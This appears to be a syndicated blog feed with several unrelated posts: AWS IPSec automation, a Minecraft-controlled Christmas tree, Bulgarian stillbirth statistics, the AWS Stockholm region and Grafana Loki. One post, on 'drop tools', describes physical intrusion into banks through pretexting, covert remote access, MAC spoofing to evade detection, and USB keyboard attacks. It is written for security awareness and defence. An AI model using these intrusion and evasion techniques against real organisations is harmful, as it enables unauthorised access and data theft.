    Figure 8: Stop and start the instance

    Figure 8: Stop and start the instance

    1. As an alternative to step 3, if you prefer not to stop and start the instance, you can invoke the IPSecSetup Lambda function via Test Event with a test JSON event in the following format:
      
                      { "detail" :  
                          { "instance-id": "YOUR_INSTANCE_ID" }
                      }
              

      A sample of test event creation in the Lambda Design window is shown below:
       

      Figure 9: Sample test event creation

      Figure 9: Sample test event creation

Monitoring and alarms

The solution delivers and takes care of IPSec/IKE Metrics and SNS Alarms in the case of errors. To monitor your IPSec environment, you can use Amazon CloudWatch. You can see metrics for active IPSec sessions, IKE/ESP errors, and connection shunts.
 

Figure 10: View metrics for active IPSec sessions, IKE/ESP errors, and connection shunts

Figure 10: View metrics for active IPSec sessions, IKE/ESP errors, and connection shunts

There are two SNS topics and alarms configured for IPSec setup failure or certificate reenrollment failure. You will see an alarm and an SNS message. It’s very important that your administrator subscribes to notifications so that you can react quickly. If you receive an alarm, please use the information in the “Troubleshooting” section of this post, below.
 

Figure 11: Alarms

Figure 11: Alarms

Troubleshooting

Below, I’ve listed some common errors and how to troubleshoot them:
 

The IPSec Tag doesn’t change to IPSec:enabled upon EC2 launch.

  1. Wait 2 minutes after the EC2 instance launches, so that it becomes reachable for AWS SSM.
  2. Check that the EC2 Instance has the right role assigned for the SSM Agent. The role is provisioned by the solution named Ec2IPsec-{stackname}.
  3. Check that the SSM Agent is reachable via a NAT gateway, an Internet gateway, or a private SSM endpoint.
  4. For CenOS and RedHat, check that you’ve installed the SSM Agent. See “Launching the EC2 instance.”
  5. Check the output of the SSM Agent command execution in the EC2 service.
  6. Check the IPSecSetup Lambda logs in CloudWatch for details.

The IPSec connection is lost after a few hours and can only be established from one host (in one direction).

  1. Check that your Security Groups allow ESP Protocol and UDP 500. Security Groups are stateful. They may only allow a single direction for IPSec establishment.
  2. Check that your network ACL allows UDP 500 and ESP Protocol.

The SNS Alarm on IPSec reenrollment is trigged, but everything seems to work fine.

  1. Certificates are valid for 30 days and rotated every week. If the rotation fails, you have three weeks to fix the problem.
  2. Check that the EC2 instances are reachable over AWS SSM. If reachable, trigger the certificate rotation Lambda again.
  3. See the IPSecSetup Lambda logs in CloudWatch for details.

DNS Route 53, RDS, and other managed services are not reachable.

  1. DNS, RDS and other managed services do not support IPSec. You need to exclude them from encryption by listing them in the config/clear list. For more details see step 2 of Installation (one-time setup) in this blog.

Here are some additional general IPSec commands for troubleshooting:

Stopping IPSec can be done by executing the following unix command:


        sudo ipsec stop 
        

If you want to stop IPSec on all instances, you can execute this command via AWS Systems Manager on all instances with the tag IPSec:enabled. Stopping encryption means all traffic will be sent unencrypted.

If you want to have a fail-open case, meaning on IKE(IPSec) failure send the data unencrypted, then configure your network in config/private-or-clear as described in step 2 of Installation (one-time setup).

Debugging IPSec issues can be done using Libreswan commands . For example:


        sudo ipsec status 
        
        sudo ipsec whack –debug `
        
        sudo ipsec barf 
        

Security

The CA key is encrypted using an Advanced Encryption Standard (AES) 256 CBC 128-byte secret and stored in a bucket with server-side encryption (SSE). The secret is envelope-encrypted with a CMK in AWS KMP pattern. Only the certificate-issuing Lambda function can decrypt the secret KMS resource policy. The encrypted secret for the CA key is set in an encrypted environment variable of the certificate-issuing Lambda function.

The IPSec host private key is generated by the certificate-issuing Lambda function. The private key and certificate are encrypted with AES 256 CBC (PKCS12) and protected with a 128-byte secret generated by KMS. The secret is envelope-encrypted with a user CMK. Only the EC2 instances with attached IPSec IAM policy can decrypt the secret and private key.

The issuing of the certificate is a full synchronous call: One request and one corresponding response without any polling or similar sync/callbacks. The host private key is not stored in a database or an S3 bucket.

The issued certificates are valid for 30 days and are stored for auditing purposes in a certificates bucket without a private key.

Alternate subject names and multiple interfaces or secondary IPs

The certificate subject name and AltSubjectName attribute contains the private Domain Name System (DNS) of the EC2 and all private IPs assigned to the instance (interfaces, primary, and secondary IPs).

The provided default libreswan configuration covers a single interface. You can adjust the configuration according to libreswan documentation for multiple interfaces, for example, to cover Amazon Elastic Container Service for Kubernetes (Amazon EKS).

Conclusion

With the solution in this blog post, you can automate the process of building an encryption IPSec layer for your EC2 instances to protect your workloads. You don’t need to worry about configuring certificates, monitoring, and alerting. The solution uses a combination of AWS KMS, IAM, AWS Lambda, CloudWatch and the libreswan implementation. If you need libreswan support, use the mailing list or github. AWS forums can give you more information on KMS for IAM. If you require a special enterprise enhancement, contact AWS professional services.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Vesselin Tzvetkov

Vesselin is senior security consultant at AWS Professional Services and is passionate about security architecture and engineering innovative solutions. Outside of technology, he likes classical music, philosophy, and sports. He holds a Ph.D. in security from TU-Darmstadt and a M.S. in electrical engineering from Bochum University in Germany.

Minecraft-controlled real world Christmas tree

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/minecraft-controlled-christmas-tree/

Interact with the real world via the block world, with the Minecraft-controlled Christmas tree from the team at BroCraft Gaming.

Illuminating

David Stevens of BroCraft Gaming reached out to us last month to let us know about the real-life Christmas tree he and his team were planning to hack using Minecraft. Intriguing? Obviously. And after a few more emails, David has been back in touch to let us know the tree hack is now live and ready for the world to interact with.

Here’s a blurb from the BroCraft team:

Join our Minecraft server at brocraftlive.net, complete the tutorial if you haven’t already, and type /mcct to join our snowy wonderland. Collect power from power blocks dotted everywhere, then select a pattern with the Technician, and watch as the tree lights up on the camera stream LIVE before your very eyes! Visit the attractions, play our minigames, and find out what else our server has to offer.

The tree uses individually addressable LEDs and the Adafruit Neopixel Python library. And with the help of a bespoke Java plugin, all instructions from within the Minecraft server are fed to the lights via a Raspberry Pi.

You can view the live Christmas tree camera stream here, along with a brief FAQ on interacting with the tree within the BroCraft Minecraft server.

Minecraft Pi

You’ll need access to Minecraft to be able to interact with the tree. And, lucky for you, Minecraft Pi comes free with Raspbian on the Raspberry Pi!

To flash the Raspbian image onto an SD card, follow this video tutorial from the team at The MagPi. And to get more acquainted with Minecraft on the Raspberry Pi, check out our free resources, including the getting started guide, Minecraft selfies, and the big Minecraft piano.



Find more free Raspberry Pi resources on our projects site, and immerse yourself even further into the world of Minecraft Pi with The MagPi’s Hacking and Making in Minecraft Essentials Guide, available in print and as a free PDF download!

The post Minecraft-controlled real world Christmas tree appeared first on Raspberry Pi.

Няколко числа за мъртвородените в Сливен

Post Syndicated from Боян Юруков original https://yurukov.net/blog/2018/martvorodeni-sliven/

Покрай поредния фатален случай в Сливен и критиката за родилната помощ там се разрових из данните. През 2017-та в Сливен е имало 2391 раждания. 19 от тях са били с мъртвородени деца. Това означава почти 8 на 1000 раждания. За сравнение, средното за цялата страна е 6.28. Миналата година в страната е имало 404 мъртвородени деца. Тази до началото на октомври са били 243.

На пръв поглед  в областта се забелязва известно подобрение през последните 18 години. Дори така проблемът е много по-сериозен от средното за страната. Пикът е бил през 2008-ма, когато е имало 38 мъртвородени. Тук съм показал движението през годините. Числата за 2018-та се базират само на първите 9 месеца от годината. 

Тъй като броят раждания не е голям, а и самите мъртвородени са малко като абсолютен брой, наблюдението за намаление може да е измамно. Всеки един случай има сериозен ефект върху този индекс и затова при малка извадка е трудно да се прецени. Това е обяснението и за големите вариации между годините в Сливен – нещо, което не се наблюдава за страната. 

Друг момент тук е промяната през годините на дефинициите кое е аборт, мъртвородени и кое е починало дете след раждане. От лична гледна точка това беше важно за майките. За статистиката ефектът беше да се прехвърлят някои от случаите между въпросните индикатори. Тези промени създават т.н. break in sequence на данните и правят сравнението между годините малко по-трудно.  Ето, например, абсолютният брой мъртвородени.

Един интересен аргумент, който виждам често, е че има доста фатални случаи заради „преобладаващият“ брой малолетни родилки най-вече от ромски произход в Сливен. Докато наистина е вярно, че немалко от ражданията там са от хора от този етнос, също е вярно, че доста от населението на областта е ромско. Това, както и малко над средната фертилност на ромите обяснява повечето раждания.

Това, което не е вярно обаче, че мнозинството са малолетни или непълнолетни. Писах подробно по тази тема вече. Специално за Сливен средната възраст на раждане на първо детете е 23.1 години, а на което и да е дете – 25.2. Навярно заради този аргумент, впрочем, почти всички новинарски емисии натрапчиво посочваха още в началото на новината, че родилката е била на 27 и това е било първото ѝ дете. Може би, за да оборят презумпцията, че е от „определена демография“ и да накарат читателите им все пак да им пука и да прочетат. 

А проблемът е сериозен. Макар като статистика детската и майчината смъртност да намалява, все още остава доста над средното за Европа. Причините в някои региони наистина са специфични, но като цяло има сериозен проблем със следенето на бременността, здравното образование, подаване на ухо на небивалици в нета, подхода на самите акушери и лекари и не на последно място вътрешноболничните инфекции. За всички тези в една или друга степен носят отговорност здравните власти, но роля имат и неправителствените организации и самите майки. Последните два проблема обаче са най-сериозни и са изцяло в ръцете на болниците. Реалните разследвания, носенето на отговорност, взимането на мерки и стриктното следене на протоколите за работа не са нещо, с което може да се похвалят здравните ни заведения. Докато това не е проблем уникален за България, определено не се вижда напредък.

Още по темата: 
Малко данни за родилната помощ в България
Тази новина може да навреди на вашето здраве
Предотвратимата смърт в България – само наполовина това, което си мислите
Източници: НСИ, НЦОЗА

Now Open – AWS Europe (Stockholm) Region

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/now-open-aws-europe-stockholm-region/

The AWS Region in Sweden that I promised you last year is now open and you can start using it today! The official name is Europe (Stockholm) and the API name is eu-north-1. This is our fifth region in Europe, joining the existing regions in Europe (Ireland), Europe (London), Europe (Frankfurt), and Europe (Paris). Together, these regions provide you with a total of 15 Availability Zones and allow you to architect applications that are resilient and fault tolerant. You now have yet another option to help you to serve your customers in the Nordics while keeping their data close to home.

Instances and Services
Applications running in this 3-AZ region can use C5, C5d, D2, I3, M5, M5d, R5, R5d, and T3 instances, and can use of a long list of AWS services including Amazon API Gateway, Application Auto Scaling, AWS Artifact, AWS Certificate Manager (ACM), Amazon CloudFront, AWS CloudFormation, AWS CloudTrail, Amazon CloudWatch, CloudWatch Events, Amazon CloudWatch Logs, AWS CodeDeploy, AWS Config, AWS Config Rules, AWS Database Migration Service, AWS Direct Connect, Amazon DynamoDB, EC2 Auto Scaling, EC2 Dedicated Hosts, Amazon Elastic Container Service for Kubernetes, AWS Elastic Beanstalk, Amazon Elastic Block Store (EBS), Amazon Elastic Compute Cloud (EC2), Elastic Container Registry, Amazon ECS, Application Load Balancers (Classic, Network, and Application), Amazon EMR, Amazon ElastiCache, Amazon Elasticsearch Service, Amazon Glacier, AWS Identity and Access Management (IAM), Amazon Kinesis Data Streams, AWS Key Management Service (KMS), AWS Lambda, AWS Marketplace, AWS Organizations, AWS Personal Health Dashboard, AWS Resource Groups, Amazon RDS for Aurora, Amazon RDS for PostgreSQL, Amazon Route 53 (including Private DNS for VPCs), AWS Server Migration Service, AWS Shield Standard, Amazon Simple Notification Service (SNS), Amazon Simple Queue Service (SQS), Amazon Simple Storage Service (S3), Amazon Simple Workflow Service (SWF), AWS Step Functions, AWS Storage Gateway, AWS Support API, Amazon EC2 Systems Manager (SSM), AWS Trusted Advisor, Amazon Virtual Private Cloud, VM Import, and AWS X-Ray.

Edge Locations and Latency
CloudFront edge locations are already operational in four cities adjacent to the new region:

  • Stockholm, Sweden (3 locations)
  • Copenhagen, Denmark
  • Helsinki, Finland
  • Oslo, Norway

AWS Direct Connect is also available in all of these locations.

The region also offers low-latency connections to other cities and AWS regions in area. Here are the latest numbers:

AWS Customers in the Nordics
Tens of thousands of our customers in Denmark, Finland, Iceland, Norway, and Sweden already use AWS! Here’s a sampling:

Volvo Connected Solutions Group – AWS is their preferred cloud solution provider; allowing them to connect over 800,000 Volvo trucks, buses, construction equipment, and Penta engines. They make heavy use of microservices and will use the new region to deliver services with lower latency than ever before.

Fortum – Their one-megawatt Virtual Battery runs on top of AWS. The battery aggregates and controls usage of energy assets and allows Fortum to better balance energy usage across their grid. This results in lower energy costs and power bills, along with a reduced environmental impact.

Den Norske Bank – This financial services customer is using AWS to provide a modern banking experience for their customers. They can innovate and scale more rapidly, and have devoted an entire floor of their headquarters to AWS projects.

Finnish Rail – They are moving their website and travel applications to AWS in order to allow their developers to quickly experiment, build, test, and deliver personalized services for each of their customers.

And That Makes 20
With today’s launch, the AWS Cloud spans 60 Availability Zones within 20 geographic regions around the world. We are currently working on 12 more Availability Zones and four more AWS Regions in Bahrain, Cape Town, Hong Kong SAR, and Milan.

AWS services are GDPR ready and also include capabilities that are designed to support your own GDPR readiness efforts. To learn more, read the AWS Service Capabilities for GDPR and check out the AWS General Data Protection Regulation (GDPR) Center.

The Europe (Stockholm) Region is now open and you can start creating your AWS resources in it today!

Jeff;

Notes about hacking with drop tools

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/12/notes-about-hacking-with-drop-tools.html

In this report, Kasperky found Eastern European banks hacked with Raspberry Pis and “Bash Bunnies” (DarkVishnya). I thought I’d write up some more detailed notes on this.

Drop tools

A common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with $200 “netbook” (cheap notebook computers). These days, it can be done with $50 “Raspberry Pi” computers, or even $25 consumer devices reflashed with Linux.

A “Raspberry Pi” is a $35 single board computer, for which you’ll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used everywhere from home servers, robotics, and hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.

Typically what you’d do is install Kali Linux. This is a Linux “distro” that contains all the tools hackers want to use.

You then drop this box physically on the victim’s network. We often called these “dropboxes” in the past, but now that there’s a cloud service called “Dropbox”, this becomes confusing, so I guess we can call them “drop tools”. The advantage of using something like a Raspberry Pi is that it’s cheap: once dropped on a victim’s network, you probably won’t ever get it back again.

Gaining physical access to even secure banks isn’t that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren’t not nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they’ll quickly bend over an spread them if they think you are a regulator. Or, you can pretend to be maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.

Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that’s not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You’ll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.

Now that you’ve got your evil box installed, there is the question of how you remotely access it. It’s almost certainly firewalled, preventing any inbound connection.

One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization’s outbound traffic can notice these connections.

Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it’s not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connection, and then use the bar’s Internet connection to hop-scotch on in.

The third alternative, which appears to be the one used in the article above, is to use a 3G/4G modem. You can get such modems for another $15 to $30. You can get “data only” plans, especially through MVNOs, for around $1 to $5 a month, especially prepaid plans that require no identification. These are “low bandwidth” plans designed for IoT command-and-control where only a few megabytes are transferred per month, which is perfect for command-line access to these drop tools.

With all this, you are looking at around $75 for the hardware, software, and 3G/4G plan for a year to remotely connect to a box on the target network.

As an alternative, you might instead use a cheap consumer router reflashed with the OpenWRT Linux distro. A good example would be a Gl.INET device for $19. This a cheap Chinese manufacturer that makes cheap consumer routers designed specifically for us hackers who want to do creative things with them.

The benefit of such devices is that they look like the sorts of consumer devices that one might find on a local network. Raspberry Pi devices stand out as something suspicious, should they ever be discovered, but a reflashed consumer device looks trustworthy.

The problem with these devices is that they are significantly less powerful than a Raspberry Pi. The typical processor is usually single core around 500 MHz, and the typical memory is only around 32 to 128 megabytes. Moreover, while many hacker tools come precompiled for OpenWRT, you’ll end up having to build most of the tools yourself, which can be difficult and frustrating.

Hacking techniques

Once you’ve got your drop tool plugged into the network, then what do you do?

One question is how noisy you want to be, and how good you think the defenders are. The classic thing to do is run a port scanner like nmap or masscan to map out the network. This is extremely noisy and even clueless companies will investigate.

This can be partly mitigated by spoofing your MAC and IP addresses. However, a properly run network will still be able to track back the addresses to the proper port switch. Therefore, you might want to play with a bunch of layer 2 things. For example, passively watch for devices that get turned off a night, then spoof their MAC address during your night time scans, so that when they come back in the morning, they’ll trace it back to the wrong device causing the problem.

An easier thing is to passively watch what’s going on. In purely passive mode, they really can’t detect that you exist at all on the network, other than the fact that the switch port reports something connected. By passively looking at ARP packets, you can get a list of all the devices on your local segment. By passively looking at Windows broadcasts, you can map out large parts of what’s going on with Windows. You can also find MacBooks, NAT routers, SIP phones, and so on.

This allows you to then target individual machines rather than causing a lot of noise on the network, and therefore go undetected.

If you’ve got a target machine, the typical procedure is to port scan it with nmap, find the versions of software running that may have known vulnerabilities, then use metasploit to exploit those vulnerabilities. If it’s a web server, then you might use something like burpsuite in order to find things like SQL injection. If it’s a Windows desktop/server, then you’ll start by looking for unauthenticated file shares, man-in-the-middle connections, or exploit it with something like EternalBlue.

The sorts of things you can do is endless, just read any guide on how to use Kali Linux, and follow those examples.

Note that your command-line connection may be a low-bandwidth 3G/4G connection, but when it’s time to exfiltrate data, you’ll probably use the corporate Internet connection to transfer gigabytes of data.

USB hacking tools

The above paper described not only drop tools attached to the network, but also tools attached view USB. This is a wholly separate form of hacking.

According to the description, the hackers used BashBunny, a $100 USB device. It’s a computer than can emulate things like a keyboard.

However, a cheaper alternative is the Raspberry Pi Zero W for $15, with Kali Linux installed, especially a Kali derivative like this one that has USB attack tools built in and configured.

One set of attacks is through a virtual keyboard and mouse. It can keep causing mouse/keyboard activity invisibly in the background to avoid the automatic lockout, then presumably at night, run commands that will download and run evil scripts. A good example is the “fileless PowerShell” scripts mentioned in the article above.

This may be combined with emulation of a flash drive. In the old days, hostile flash drives could directly infect a Windows computer once plugged in. These days, that won’t happen without interaction by the user — interaction using a keyboard/mouse, which the device can also emulate.

Another set of attacks is pretending to be a USB Ethernet connection. This allows network attacks, such as those mentioned above, to travel across the USB port, without being detectable on the real network. It also allows additional tricks. For example, it can configure itself to be the default route for Internet (rather than local) access, redirecting all web access to a hostile device on the Internet. In other words, the device will usually be limited in that it doesn’t itself have access to the Internet, but it can confuse the network configuration of the Windows device to cause other bad effects.

Another creative use is to emulate a serial port. This works for a lot of consumer devices and things running Linux. This will get you a shell directly on the device, or a login that accepts a default or well-known backdoor password. This is a widespread vulnerability because it’s so unexpected.

In theory, any USB device could be emulated. Today’s Windows, Linux, and macOS machines have a lot of device drivers that are full of vulnerabilities that an be exploited. However, I don’t see any easy to use hacking toolkits that’ll make this easy for you, so this is still mostly just theoretical.

Defense

The purpose of this blogpost isn’t “how to hack” by “how to defend”. Understanding what attackers do is the first step in understanding how to stop them.
Companies need to understand the hardware on their network. They should be able to list all the hardware devices on all their switches and have a running log of any new device that connects. They need to be able to quickly find the physical location of any device, with well-documented cables and tracking which MAC address belongs to which switch port. Better yet, 802.11x should be used to require authentication on Ethernet just like you require authentication on WiFi.
The same should be done for USB. Whenever a new USB device is plugged into Windows, that should be logged somewhere. I would suggest policies banning USB devices, but they are so useful this can become very costly to do right.
Companies should have enough monitoring that they can be notified whenever somebody runs a scanner like nmap. Better yet, they should have honeypot devices and services spread throughout their network that will notify them if somebody is already inside their network.

Conclusion

Hacking a target like a bank consists of three main phrases: getting in from the outside, moving around inside the network to get to the juice bits, then stealing money/data (or causing harm). That first stage is usually the hardest, and can be bypassed with physical access, dropping some sort of computer on the network. A $50 device like a Raspberry Pi running Kali Linux is perfect for this. 

Every security professional should have experience with this. Whether it’s actually a Raspberry Pi or just a VM on a laptop running Kali, security professionals should have experience with this. They should run nmap on their network, they should run burpsuite on their intranet websites, and so on. Of course, this should only be done with knowledge and permission from their bosses, and ideally, boss’s bosses.

Loki: Prometheus-inspired, open source logging for cloud natives

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/12/12/loki-prometheus-inspired-open-source-logging-for-cloud-natives/

Loki

Introduction

This blog post is a companion piece for my talk at https://devopsdaysindia.org. I will discuss the motivations, architecture, and the future of logging in Grafana! Let’s get right down to it. You can see the slides for the talk here: https://speakerdeck.com/gouthamve/devopsdaysindia-2018-loki-prometheus-but-for-logs

Motivation

Grafana is the defacto dashboarding solution for time-series data. It supports over 40 datasources (as of this writing), and the dashboarding story has matured considerably with new features, including the addition of teams and folders. We now want to move on from being a dashboarding solution to being an observability platform, to be the go-to place when you need to debug systems on fire.

Full Observability

Observability. There are a lot of definitions out there as to what that means. Observability to me is visibility into your systems and how they are behaving and performing. I quite like the model where observability can be split into 3 parts (or pillars): metrics, logs and traces; each complimenting each other to help you figure out what’s wrong quickly.

The following example illustrates how I tackle incidents at my job:
how I tackle incidents

Prometheus sends me an alert that something is wrong and I open the relevant dashboard for the service. If I find a panel or graph anomalous, I’ll open the query in Grafana’s new Explore UI for a deeper dive. For example, if I find that one of the services is throwing 500 errors, I’ll try to figure out if a particular handler/route is throwing that error or if all instances are throwing the error, etc.

Next up, once I have a vague mental model as to what is going wrong or where it is going wrong, I’ll look at logs. Pre Loki, I used to use kubectl to get the relevant logs to see what the error is and if I could do something about it. This works great for errors, but sometimes I get paged due to high latency. In this situation I get more info from traces regarding what is slow and which method/operation/function is slow. We use Jaeger to get the traces.

While these didn’t always directly tell me what is wrong, they usually got me close enough to look at the code and figure out what is going wrong. Then I can either scale up the service (if the service is overloaded) or deploy the fix.

Logging

Prometheus works great, Jaeger is getting there, and kubectl was decent. The label model was powerful enough for me to get to the bottom of erroring services. If I found that the ingester service was erroring, I’d do: kubectl --namespace prod logs -l name=ingester | grep XXX to get the relevant logs and grep through them.

If I found a particular instance was erroring or if I wanted to tail the logs of a service, I’d have to use the individual pod for tailing as kubectl doesn’t let you tail based on label selectors. This is not ideal, but works for most use-cases.

This worked, as long as the pod wasn’t crashing or wasn’t being replaced. If the pod or node is terminated, the logs are lost forever. Also, kubectl only stores recent logs, so we’re blind when we want logs from the day before or earlier. Further, having to jump from Grafana to CLI and back again wasn’t ideal. We needed a solution that reduced context switching, and many of the solutions we explored were super pricey or didn’t scale very well.

This was expected as they do waaaay more than select + grep, which is essentially what we needed. After looking at existing solutions, we decided to build our own.

Loki

Not happy with any of the open-source solutions, we started speaking to people and noticed that A LOT of people had the same issues. In fact, I’ve come to realise that lots of developers still SSH and grep/tail the logs on machines even today! The solutions they were using were either too pricey or not stable enough. In fact, people were being asked to log less which we think is an anti-pattern for logs. We thought we could build something that we internally, and the wider open-source community could use. We had one main goal:

  • Keep it simple. Just support grep!

Keep it simple. Just support grep!

This tweet from @alicegoldfuss is not an endorsement and only serves to illustrate the problem Loki is attempting to solve

  • We also aimed for other things:
    • Logs should be cheap. Nobody should be asked to log less.
    • Easy to operate and scale
    • Metrics, logs (and traces later) need to work together

The final point was important. We were already collecting metadata from Prometheus for the metrics and we wanted to use that for log correlation. For example, Prometheus tags each metric with the namespace, service name, instance ip, etc. When I get an alert, I use the metadata to figure out where to look for logs. If we manage to tag the logs with the same metadata, we can seamlessly switch between metrics and logs. You can see the internal design doc we wrote here. See a demo video of Loki in action below:

Video: Loki – Prometheus-inspired, open source logging for cloud natives.

Architecture

With our experience building and running Cortex– the horizontally scalable, distributed version of Prometheus we run as a service– we came up with the following architecture:

Logging architecture!

Metadata between metrics and logs matching is critical for us and we initially decided to just target Kubernetes. The idea is to run a log-collection agent on each node, collect logs using that, talk to the kubernetes API to figure out the right metadata for the logs, and send them to a central service which we can use to show the logs collected inside Grafana.

The agent supports the same configuration (relabelling rules) as Prometheus to make sure the metadata matches. We called this agent promtail.

Enter Loki, the scalable log collection engine.
Logging architecture!

The write path and read path (query) are pretty decoupled from each other and it helps to talk about it each separately.
Loki: Architecture!

Distributor

Once promtail collects and sends the logs to Loki, the distributor is the first component to receive them. Now we could be receiving millions of writes per second and we wouldn’t want to write them to a database as they come in. That would kill any database out there. We would need batch and compress the data as it comes in.

We do this via building compressed chunks of the data, by gzipping logs as they come in. The ingester component is a stateful component in charge of building and then later flushing the chunks. We have multiple ingesters, and the logs belonging to each stream should always end up in the same ingester for all the relevant entries to end up in the same chunk. We do this by building a ring of ingesters and using consistent hashing. When an entry comes in, the distributor hashes the labels of the logs and then looks up which ingester to send the entry to based on the hash value.
Loki: Distributor

Further, for redundancy and resilience, we replicate it n (3, by default) times.

Ingester

Now the ingester will receive the entries and start building chunks.
Loki: Ingester

This is basically gzipping the logs and appending them. Once the chunk “fills up”, we flush it to the database. We use separate databases for the chunks (ObjectStorage) and the index, as the type of data they store is different.

Once the chunk “fills up”, we flush it to the database

After flushing a chunk, the ingester then creates a new empty chunk and adds the new entries into that chunk.

Querier

The read path is quite simple and has the querier doing most of the heavy lifting. Given a time-range and label selectors, it looks at the index to figure out which chunks match, and greps through them to give you the results. It also talks to the ingesters to get the recent data that has not been flushed yet.

Note that, right now, for each query, a single querier greps through all the relevant logs for you. We’ve implemented query parallelisation in Cortex using a frontend and the same can be extended to Loki to give distributed grep which will make even large queries snappy enough.

Loki: A look at the Querier

Scalability

Now let’s see if this scales.

  1. We’re putting the chunks into an object store and that scales.
  2. We put the index into Cassandra/Bigtable/DynamoDB which again scales.
  3. The distributors and queriers are stateless components that you can horizontally scale.

Coming to the ingester, it is a stateful component but we’ve built the full sharding and resharding lifecycle into them. When a rollout is done or when ingesters are scaled up or down, the ring topology changes and the ingesters redistribute their chunks to match the new topology. This is mostly code taken from Cortex which has been running in production for more than 2 years.

Caveats

While all of this works conceptually, we expect to hit new issues and limitations as we grow. It should be super cheap to run, given all the data will be sitting in an Object Store like S3. But you would only be able to grep through the data. This might not be suitable for other use-cases like alerting or building dashboards, which you’re better off doing in metrics.

Conclusion

Loki is very much alpha software and should not be used in production environments. We wanted to announce and release Loki as soon as possible to get feedback and contributions from the community and find out what’s working and what needs improvement. We believe this will help us deliver a higher quality and more on-point production release next year.

Loki can be run on-prem or as a free demo on Grafana Cloud. We urge you to give it a try and drop us a line and let us know what you think. Visit the Loki homepage to get started today.

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close